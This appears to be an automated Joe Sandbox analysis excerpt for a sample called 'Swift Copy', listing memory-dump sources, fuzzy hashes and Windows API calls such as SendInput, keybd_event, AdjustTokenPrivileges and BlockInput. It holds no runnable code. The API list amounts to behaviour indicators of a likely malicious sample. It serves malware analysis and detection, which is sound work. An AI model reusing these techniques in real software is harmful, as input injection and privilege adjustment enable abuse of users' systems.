                                              • Instruction ID: db86b83a2363d92ec6c0b6b090e1b744ec4c7990f5dad6df391d00afaaed0dd0
                                              • Opcode Fuzzy Hash: 28b786f1c6a760b04be9fd9ed82f9ad2d5a7ba88e93fd0b89594763d8ea08185
                                              • Instruction Fuzzy Hash: 04D0C9B480111DEECB94DB90DC88DD9F37CBB04305F200255F146A2040D73095898F20
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                              • Instruction ID: 4e534243624c4d7068f91b65c4ebaab6937bf1eea969b3979a6184ccd1600f52
                                              • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                              • Instruction Fuzzy Hash: 99021D71E112199FDF14CFA9C8806ADFBF1EF48314F298169E819E7384D731AA41CBA4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Variable is not of type 'Object'.$p#
                                              • API String ID: 0-1086706999
                                              • Opcode ID: 118a9613368f8156ebe5f40485d64d419898d29dcc9e92234c1f9325708fa530
                                              • Instruction ID: d554c80a44267ec75086fb8986d51eac49912e7642cc9faa1765ba6afc364c4f
                                              • Opcode Fuzzy Hash: 118a9613368f8156ebe5f40485d64d419898d29dcc9e92234c1f9325708fa530
                                              • Instruction Fuzzy Hash: A4324670910219DFDF14DF94C981BEDBBB5EF05304F28905DE84AAB292E735AA46CB70
                                              APIs
                                              • FindFirstFileW.KERNEL32(?,?), ref: 00DE6918
                                              • FindClose.KERNEL32(00000000), ref: 00DE6961
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Find$CloseFileFirst
                                              • String ID:
                                              • API String ID: 2295610775-0
                                              • Opcode ID: abeb2f01ab402f9825d8a7577dd61e68fa98c1797364951cfd124af96f086104
                                              • Instruction ID: f1de582bfcc7e2f913c13520d754c6ccbf7fcbe9515f747357063718bd0e4186
                                              • Opcode Fuzzy Hash: abeb2f01ab402f9825d8a7577dd61e68fa98c1797364951cfd124af96f086104
                                              • Instruction Fuzzy Hash: C51190316146409FC710DF6AD884A1ABBE5FF85328F18C69DE4698F6A2D730EC45CBA1
                                              APIs
                                              • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00DF4891,?,?,00000035,?), ref: 00DE37E4
                                              • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00DF4891,?,?,00000035,?), ref: 00DE37F4
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: ErrorFormatLastMessage
                                              • String ID:
                                              • API String ID: 3479602957-0
                                              • Opcode ID: 559bfb5aa758b54753bb43618ce7862cfc025697623d7c4c54ade067fe669026
                                              • Instruction ID: 0edefd76fafe4bed0305437d30742cda62cd971dd24075474fe52021c2e75d8c
                                              • Opcode Fuzzy Hash: 559bfb5aa758b54753bb43618ce7862cfc025697623d7c4c54ade067fe669026
                                              • Instruction Fuzzy Hash: 0FF0E5B16052286AEB2027A78C4DFEB7AAEEFC4761F000265F509E3291D9609948C7B0
                                              APIs
                                              • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00DDB25D
                                              • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 00DDB270
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: InputSendkeybd_event
                                              • String ID:
                                              • API String ID: 3536248340-0
                                              • Opcode ID: e91a643179127577aa8c5a536bde3c42f98a139398517c826399387e7661dddd
                                              • Instruction ID: 96a823cb0991fd309460c14064f4b38da210a44a244286576024d083f280afc3
                                              • Opcode Fuzzy Hash: e91a643179127577aa8c5a536bde3c42f98a139398517c826399387e7661dddd
                                              • Instruction Fuzzy Hash: 69F01D7580424DAFDB059FA1C805BAE7FB4FF08319F14800AF955A5191C379C6559FA4
                                              APIs
                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00DD11FC), ref: 00DD10D4
                                              • CloseHandle.KERNEL32(?,?,00DD11FC), ref: 00DD10E9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: AdjustCloseHandlePrivilegesToken
                                              • String ID:
                                              • API String ID: 81990902-0
                                              • Opcode ID: fa637afec537e3fd5979bc1417d35706287476b9fb6808995c4097a767fd6fe7
                                              • Instruction ID: 0fbb2c705fa46957dcce23864f8f43d16586543ffa24a737cd469e87bbb0730c
                                              • Opcode Fuzzy Hash: fa637afec537e3fd5979bc1417d35706287476b9fb6808995c4097a767fd6fe7
                                              • Instruction Fuzzy Hash: D5E0BF72014611FEE7252B51FC05E7777A9EB04311B24892EF5A5905B1DB626CE0DB60
                                              APIs
                                              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00DA6766,?,?,00000008,?,?,00DAFEFE,00000000), ref: 00DA6998
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: ExceptionRaise
                                              • String ID:
                                              • API String ID: 3997070919-0
                                              • Opcode ID: 74e4b672e2df45a8de248d6d7e85e94e8e1c4fe8c0b8f61d92eb076b70dc3f11
                                              • Instruction ID: 52b66fe9be60e234bf1cbb76c70e2f021c54f37ad46933e7aa4a7d8118a7e087
                                              • Opcode Fuzzy Hash: 74e4b672e2df45a8de248d6d7e85e94e8e1c4fe8c0b8f61d92eb076b70dc3f11
                                              • Instruction Fuzzy Hash: A4B11835610608DFD715CF28C48AB657BA0FF46364F2D8658E89ACF2E2C739E991CB50
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID: 0-3916222277
                                              • Opcode ID: e9ae90f4be1abe80c7f906986c7d2212eee355f8f3234b6940904a31f1c9ac22
                                              • Instruction ID: 3b03138f874bb8f8d768349b0c1771080a0988188947bdff6048a5dd16f1f40c
                                              • Opcode Fuzzy Hash: e9ae90f4be1abe80c7f906986c7d2212eee355f8f3234b6940904a31f1c9ac22
                                              • Instruction Fuzzy Hash: 9E1230719002299FDB14DF58C881BEEB7B5FF48710F1481AAE849EB255DB349A81DFA0
                                              APIs
                                              • BlockInput.USER32(00000001), ref: 00DEEABD
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: BlockInput
                                              • String ID:
                                              • API String ID: 3456056419-0
                                              • Opcode ID: 99612e6bb8e683eea19e19e4bea44e2c1352b8826136108e9185db80c326e240
                                              • Instruction ID: 67c3157f258b1b80a09b76ac6a67b2d7f66bda428fa2641fb9d43a3863d31987
                                              • Opcode Fuzzy Hash: 99612e6bb8e683eea19e19e4bea44e2c1352b8826136108e9185db80c326e240
                                              • Instruction Fuzzy Hash: B0E01A312102049FC710EF6AD804E9AF7E9EF98764F00842AFC49D7291EB71E8408BB0
                                              APIs
                                              • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,00D903EE), ref: 00D909DA
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: ExceptionFilterUnhandled
                                              • String ID:
                                              • API String ID: 3192549508-0
                                              • Opcode ID: 54ae55a1c6cbb806820630f8b21a404286d4bff9385bb8f128f51d4e58527dfd
                                              • Instruction ID: 585ea51ac33ea08f0e4f2e61d5815cfb19836345bc084c61791ce55fb98e6b92
                                              • Opcode Fuzzy Hash: 54ae55a1c6cbb806820630f8b21a404286d4bff9385bb8f128f51d4e58527dfd
                                              • Instruction Fuzzy Hash:
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 0
                                              • API String ID: 0-4108050209
                                              • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                              • Instruction ID: 3cc9897820b05c9dbf03138267b1a58f2881726391cadb7b976dbd90dffb2d89
                                              • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                              • Instruction Fuzzy Hash: 6451787173C7056BDF388568885E7FE6789DB12344F1C060AD8C6DB282C615DE02E776
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 0&
                                              • API String ID: 0-2523485602
                                              • Opcode ID: adf816de322d349c8a68df28eb1732db6c04538df858b2dce16ce71dbd71e6e4
                                              • Instruction ID: 8c6d9758645ec26dc97a436b17703e0f412856ad70c8a1408e5ddaf1b018c5c1
                                              • Opcode Fuzzy Hash: adf816de322d349c8a68df28eb1732db6c04538df858b2dce16ce71dbd71e6e4
                                              • Instruction Fuzzy Hash: C521BB327205158BD728CF7AC81367E73E9A754310F59866EE4A7D37D0DE35A904C790
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f9eaefc9c44cd7239a8021744c2e8cbf9e4d682100aeb46f13e037c191f55645
                                              • Instruction ID: 31382ca5f7146735eaf0b8807b8876996aebb03355c5e4e73142bae111ce9fe5
                                              • Opcode Fuzzy Hash: f9eaefc9c44cd7239a8021744c2e8cbf9e4d682100aeb46f13e037c191f55645
                                              • Instruction Fuzzy Hash: 32322632D29F014DD7239A39DC22336A689AFB73C5F15D73BF81AB59A5EB29C4834100
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 51227a0baec85f2de733fc1136e1d4ad67e48fea53dfc383eab77a091dd51dd6
                                              • Instruction ID: ae2d65ddaf484d134daa6faeeb6e1ea8ac4d07fbb6fa3fdef1a29004cbb8fada
                                              • Opcode Fuzzy Hash: 51227a0baec85f2de733fc1136e1d4ad67e48fea53dfc383eab77a091dd51dd6
                                              • Instruction Fuzzy Hash: DE32F331A20106DBCF28DA69C494F7D7BA1EB85300F2CA56ED68EDB291D630DD81DB71
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c69150f2d6582181f97f50d548387596615e9c3b9cfad742ccf923c5fc0a4e44
                                              • Instruction ID: a0061146567d77a81509617e8b0e83254c39c11db579d5eeeb2258ddd809b42c
                                              • Opcode Fuzzy Hash: c69150f2d6582181f97f50d548387596615e9c3b9cfad742ccf923c5fc0a4e44
                                              • Instruction Fuzzy Hash: 43228C70A04609DFDF14DF68D881AEEB7F5FF48300F148529E85AA7295EB36A914CB70
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 48805fdd8feea9bea3f1d5d798708036c234c6ebb49f548eb7b8ca0caba5b4c2
                                              • Instruction ID: 6c75b722aa104448189c91545a4b671bb677adf04544010bc7d86d5f3d731155
                                              • Opcode Fuzzy Hash: 48805fdd8feea9bea3f1d5d798708036c234c6ebb49f548eb7b8ca0caba5b4c2
                                              • Instruction Fuzzy Hash: 9C02A7B1A00209EFDF05DF64D881AEDBBB5FF44300F548169E85A9B291E731EE14CBA5
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
